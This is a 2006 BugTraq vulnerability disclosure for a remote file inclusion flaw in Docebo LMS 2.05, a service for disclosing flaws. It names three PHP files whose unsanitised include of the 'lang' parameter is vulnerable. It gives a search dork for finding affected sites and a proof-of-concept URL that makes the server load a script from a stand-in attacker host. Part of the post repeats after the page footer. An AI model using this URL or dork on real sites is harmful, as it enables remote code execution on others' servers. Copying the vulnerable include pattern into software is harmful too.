BugTraq
Back to list
|
Post reply
Docebo LMS 2.05 Remote File Include
May 25 2006 08:15PM
beford (xbefordx gmail com)
Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evil
h4x0rscript>/?
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Discovered: beford <xbefordx gmail com>
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evil
h4x0rscript>/?
[ reply ]